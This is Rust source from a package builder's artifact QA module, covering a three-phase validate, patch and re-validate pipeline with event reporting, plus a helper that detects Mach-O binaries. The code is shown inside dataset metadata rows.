            AppEvent::General(GeneralEvent::debug("Artifact QA pipeline completed")),
        );
        return Ok(());
    };

    let qa_level = qa_level_for_profile(profile);
    send_event(
        ctx,
        AppEvent::Qa(QaEvent::PipelineStarted {
            target: target.clone(),
            level: qa_level,
        }),
    );

    // ---------------- PHASE 1: pre-validation -----------------
    let mut pre = match run_validators(
        ctx,
        env,
        router::get_validators_for_profile(profile),
        false, // Don't allow early break - run all validators
        &target,
        &mut stats,
    )
    .await
    {
        Ok(report) => report,
        Err(err) => {
            emit_pipeline_failed(ctx, &target, &err);
            return Err(err);
        }
    };

    // Extract findings from Phase 1 validators to pass to patchers
    let validator_findings = pre.take_findings();

    // ---------------- PHASE 2: patching -----------------
    if let Err(err) = run_patchers(
        ctx,
        env,
        validator_findings,
        router::get_patchers_for_profile(profile),
        &target,
        &mut stats,
    )
    .await
    {
        emit_pipeline_failed(ctx, &target, &err);
        return Err(err);
    }

    // ---------------- PHASE 3: post-validation -----------------
    let post = match run_validators(
        ctx,
        env,
        router::get_validators_for_profile(profile),
        true, // Allow early break in final validation
        &target,
        &mut stats,
    )
    .await
    {
        Ok(report) => report,
        Err(err) => {
            emit_pipeline_failed(ctx, &target, &err);
            return Err(err);
        }
    };

    if post.is_fatal() {
        let failure_error: Error = BuildError::Failed {
            message: post.render("Relocatability check failed"),
        }
        .into();
        emit_pipeline_failed(ctx, &target, &failure_error);
        return Err(failure_error);
    }

    // `post` is known clean past the early return above, so only the
    // pre-validation result gates the success notification (the previous
    // `!pre.is_fatal() && !post.is_fatal()` condition was half-redundant).
    if !pre.is_fatal() {
        send_event(
            ctx,
            AppEvent::General(GeneralEvent::OperationCompleted {
                operation: "Post‑build validation".into(),
                success: true,
            }),
        );
    }

    let duration_ms = u64::try_from(pipeline_start.elapsed().as_millis()).unwrap_or(u64::MAX);
    let total_checks = stats.total;
    let failed_checks = stats.failed;
    let passed_checks = total_checks.saturating_sub(failed_checks);
    send_event(
        ctx,
        AppEvent::Qa(QaEvent::PipelineCompleted {
            target,
            total_checks,
            passed: passed_checks,
            failed: failed_checks,
            duration_ms,
        }),
    );
    Ok(())
}
/// Utility that runs validators and merges their reports.
///
/// Executes each validator in sequence, emitting one QA check event per
/// action and folding every report into a single merged result. When
/// `allow_early_break` is set, iteration stops as soon as the merged
/// report turns fatal, skipping the remaining validators.
async fn run_validators(
    ctx: &BuildContext,
    env: &BuildEnvironment,
    actions: Vec<ValidatorAction>,
    allow_early_break: bool,
    target: &QaTarget,
    stats: &mut QaStats,
) -> Result<MergedReport, Error> {
    let mut combined = MergedReport::default();
    for validator in &actions {
        let name = validator.name();
        let started = Instant::now();
        // Validators never receive prior findings, hence the `None`.
        let report = validator.run(ctx, env, None).await?;
        emit_qa_check(
            ctx,
            target,
            "validator",
            name,
            &report,
            started.elapsed(),
            stats,
        );
        combined.absorb(report);
        // Optionally short-circuit once a fatal issue has been recorded.
        if allow_early_break && combined.is_fatal() {
            break;
        }
    }
    Ok(combined)
}
/// Utility that runs patchers and merges their reports.
///
/// Each patcher receives the findings collected by the Phase 1 validators
/// (if any) so it can target the issues they flagged. One QA check event is
/// emitted per patcher; a fatal merged report stops the run immediately.
async fn run_patchers(
    ctx: &BuildContext,
    env: &BuildEnvironment,
    validator_findings: Option<DiagnosticCollector>,
    actions: Vec<PatcherAction>,
    target: &QaTarget,
    stats: &mut QaStats,
) -> Result<MergedReport, Error> {
    let mut combined = MergedReport::default();
    for patcher in &actions {
        let name = patcher.name();
        let started = Instant::now();
        let report = patcher.run(ctx, env, validator_findings.as_ref()).await?;
        emit_qa_check(
            ctx,
            target,
            "patcher",
            name,
            &report,
            started.elapsed(),
            stats,
        );
        combined.absorb(report);
        // Patchers always stop at the first fatal report.
        if combined.is_fatal() {
            break;
        }
    }
    Ok(combined)
}
/// Running tally of QA checks evaluated during one pipeline execution,
/// updated by `emit_qa_check` and reported in `QaEvent::PipelineCompleted`.
#[derive(Default)]
struct QaStats {
    // Total number of checks (validators + patchers) evaluated so far.
    total: usize,
    // Subset of `total` whose summary status was `QaCheckStatus::Failed`.
    failed: usize,
}
/// Build the QA event target descriptor (package name + version) from the
/// current build context.
fn qa_target(ctx: &BuildContext) -> QaTarget {
    let package = ctx.name.clone();
    let version = ctx.version.clone();
    QaTarget { package, version }
}
fn qa_level_for_profile(profile: BuildSystemProfile) -> QaLevel {
match profile {
BuildSystemProfile::NativeFull => QaLevel::Strict,
BuildSystemProfile::GoMedium => QaLevel::Standard,
BuildSystemProfile::ScriptLight | BuildSystemProfile::RustMinimal => QaLevel::Fast,
}
}
/// Flatten a validator/patcher `Report` into a list of `QaFinding`s.
///
/// Error messages map to `QaSeverity::Error` and warning messages to
/// `QaSeverity::Warning`; any collected diagnostics are additionally
/// reported as warnings tagged with the offending file path. Line
/// information is not available at this level, so `line` is always `None`.
fn qa_findings_from_report(report: &Report) -> Vec<QaFinding> {
    // Reserve space for the messages we can count up front; diagnostics
    // (if present) are appended on top of that.
    let mut findings = Vec::with_capacity(report.errors.len() + report.warnings.len());
    findings.extend(report.errors.iter().map(|message| QaFinding {
        severity: QaSeverity::Error,
        message: message.clone(),
        file: None,
        line: None,
    }));
    findings.extend(report.warnings.iter().map(|message| QaFinding {
        severity: QaSeverity::Warning,
        message: message.clone(),
        file: None,
        line: None,
    }));
    if let Some(diags) = &report.findings {
        for finding in diags.findings() {
            findings.push(QaFinding {
                severity: QaSeverity::Warning,
                message: finding.issue_type.description(),
                file: Some(finding.file_path.clone()),
                line: None,
            });
        }
    }
    findings
}
/// Convert a single action's `Report` into the `QaCheckSummary` payload
/// carried by `QaEvent::CheckEvaluated`.
fn build_check_summary(
    category: &str,
    name: &str,
    report: &Report,
    duration: Duration,
) -> QaCheckSummary {
    let status = if report.is_fatal() {
        QaCheckStatus::Failed
    } else {
        QaCheckStatus::Passed
    };
    // Saturate instead of panicking if the elapsed millis overflow u64.
    let duration_ms = u64::try_from(duration.as_millis()).unwrap_or(u64::MAX);
    QaCheckSummary {
        name: name.to_string(),
        category: category.to_string(),
        status,
        duration_ms: Some(duration_ms),
        findings: qa_findings_from_report(report),
    }
}
/// Record one QA check in the running stats and publish its summary event.
fn emit_qa_check(
    ctx: &BuildContext,
    target: &QaTarget,
    category: &str,
    action_name: &str,
    report: &Report,
    duration: Duration,
    stats: &mut QaStats,
) {
    let summary = build_check_summary(category, action_name, report, duration);
    // Every evaluated check counts toward the total; failures are tallied
    // separately (bool converts to 0/1).
    stats.total += 1;
    stats.failed += usize::from(matches!(summary.status, QaCheckStatus::Failed));
    let event = AppEvent::Qa(QaEvent::CheckEvaluated {
        target: target.clone(),
        summary,
    });
    send_event(ctx, event);
}
fn emit_pipeline_failed(ctx: &BuildContext, target: &QaTarget, error: &Error) {
send_event(
ctx,
AppEvent::Qa(QaEvent::PipelineFailed {
target: target.clone(),
failure: FailureContext::from_error(error),
}),
);
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/macho_utils.rs | crates/builder/src/artifact_qa/macho_utils.rs | //! Shared utilities for working with Mach-O files
//! Used by both scanners and patchers to ensure consistent detection
use object::FileKind;
use std::path::Path;
/// Check if a file is a Mach-O binary by parsing its header
///
/// Uses the exact same logic as the `MachO` scanner. Returns true if the file
/// can be parsed as a valid Mach-O binary.
#[must_use]
pub fn is_macho_file(path: &Path) -> bool {
if let Ok(data) = std::fs::read(path) {
FileKind::parse(&*data).is_ok()
} else {
false
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.